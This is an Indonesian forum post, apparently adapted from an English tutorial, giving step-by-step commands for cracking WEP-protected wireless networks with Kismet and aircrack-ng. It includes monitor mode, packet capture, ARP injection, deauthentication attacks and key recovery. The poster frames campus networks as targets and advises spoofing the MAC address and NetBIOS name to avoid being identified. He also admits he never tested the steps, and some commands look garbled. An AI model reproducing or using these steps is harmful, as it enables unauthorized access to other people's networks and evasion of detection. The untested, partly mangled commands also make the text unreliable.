spofing hacking - how to crack wep

Topik sebelumnya Topik selanjutnya Go down

spofing hacking - how to crack wep

Post  Darkcave on Sat Mar 15, 2008 3:42 am

sebenarnya gw bukan ahlinya disini gw cuma share aja daripada gak ada yg posting mendingan gw ngepost-in hasil jalan2 gw semaleman.!
oke bahasan nya adalah CRACK WEP !!!.

Apa itu CRACK WEP ???….

Saya sendiri juga kurang tahu. Lho … gak tau koq malah di posting ?? Very Happy . Saya hanya tertarik pada bagian cracking security-nya pada wireless network connection. Selaen itu didaerah kmpus saya ternyata banyak juga lhoo yg wireless area nya diprotect. Nahh, bisa jadi bahan percobaan nih. Tapi sialnya saya gak punya tools utk coba cara ini. Itulah gunanya saya posting disini, jika anda udah berhasil maka secepatnya hubungi saya. Very Happy

Tutor ini hasil saduran Tutorial yang ditulis oleh glj12 dengan judul asli ” Spoonfed Hacking - How to Crack WEP (Local Hacking) Tutorial ” di leetupload.com

Baiklah langsung saja kita persiapkan apa saja yg dibutuhkan :



1. Laptop (tentunya Very Happy) dg dual boot (Linux n Xp Pro).

2. CD blank untuk mbakar cd (ya iyalah).

3. Wireless Card yg bisa diinject (manipulasi-red) or liat list disini.

4. Baterai yg cukup.

5. Kismet ato netstumbler (jika ingin aman, Kismet didalam BackTrack 2 sudah komplit).

6. Ngerti linux sedikit aja …

Oke Tahap I :

1. Download dulu ISO BackTrack 2 di[url] http://remote-exploit.org/backtrack_download.html[/url], ato langsung ke tahap II jika udah punya Kismet.

2. Bakar ISO nya.

Tahap II :

1. Hidupin BackTrack 2 nya,



2. Klo udah, BT2 alias BackTrack 2 minta username n passwd. Isi dengan root lalu toor



3. Udah?? kita selanjutnya akan masuk GUI. Jika anda penggemar linux, pasti udah tau cara masuk GUI. ketik startx.

4. Jika udah, ntar akan muncul KdE desktop (klo gak slah lhoo… ). Trus masuk konsole

5. Trus ketik kismet dan tekan enter



Pic

6. Secara otomatis Kismet akan meload, mengupdate dan menampilkan semua akses point yang berada di daerah jaringan tsb,

7. Setelah pilih dan memilih target/korban.



8. ketik : iwconfig wlan0 mode monitor

(Syntax: iwconfig device_name_here mode command_monitor). Jangan lupa di enter, terus ??

10. Saatnya ngintip :

Syntax: airodump-ng –-ivs_tipe_ekstensi –-write apaaja –-channel

Jadi perintahnya airodump-ng –ivs –write file_name –channel 11 wlan0
http://numpanglewat.files.wordpress.com/2007/06/airodump.gif" alt="" />

Perintah tsb akan memulai monitoring dan mengoleksi packet dari channel yg diinginkan.

11. Terus Nginject yukk…

Syntax:

aireplay-ng -3 attack level -b BSSID_router_yg_running -h attached_computer_to_the_bssid_the_router wlan0=tipe_device.

aireplay-ng -3 -b 00:16:B6:2E:C3:4E -h 00:14:A5:8A:02:CD wlan0

12. kita akan melakukan deauthentication attack. ketik :

Syntax : Aireplay-ng -0 attack_number wlan0 device_type_of_yours -a BSSID_router_yg_running wlan0 tipe_device

aireplay-ng -0 wlan0 -a 00:16:B6:2E:C3:4E wlan0

13. Hmm.. saya makin pusing nih. Tapi gak apa kita teruskan ..

Selanjutnya ganti direktori ke file apaaja.ivs yg disave tadi. kemudian eksekusi dengan perintah :

Syntax: aircrack-ng -0 attack_type -n number_of_the_encryption_type(64 or 128) -fudgefactor 2-18 *.cap or *.ivs

aircrack-ng -0 -n 128 -f 4 file_name.ivs

Catt : 00:16:B6:2E:C3:4E >> BSSID dari router yg running

00:14:A5:8A:02:CD >> Computer yg make BSSID (ditampilkan oleh kismet)

wlan0 >> device router yg kita gunain.

-0 >> Jenis serangan

-n >> tipe enkripsi (64 ato 128)

-fudgefactor >> isi 2-18

*.cap ato *.ivs >> ekstensi file yg disave

AKhirnya … binGGOOOOO …. ! . Kita dapetin kunci WEP (hex).



Terus langkah selanjutna tinggal konek ke SSID. ganti Mac address n Netbios nya dulu biar gak ketahuan MAC asli kita. Donlot programnya di irongeek.com atau bisa juga pake KMACS (saran red).





N HAving Fun ……..

hacking bukan sekedar TEORI, nahh …. itulah sebenarna yng benar. Jadi OBROLAN saya diatas tadi adalah bualan belaka. Cos saya belom pernah mempraktekkannya. Karena saya bukan MASTER!!!, jadi saya hanyalah pembual belaka …

Jadi ??? jika anda ingin mencobanya silahkan baca tutor aslinya di

http://www.leetupload.com

http://digg.com/security/Spoonfed_Hacking_How_to_Crack_WEP_Local_Hacking_Tutorial
avatar
Darkcave
Moderators
Moderators

Jumlah posting : 29
Age : 37
Location : Tokyo, Japan
Registration date : 16.11.07

Lihat profil user http://www.stmik-mdp.org

Kembali Ke Atas Go down

Topik sebelumnya Topik selanjutnya Kembali Ke Atas


 
Permissions in this forum:
Anda tidak dapat menjawab topik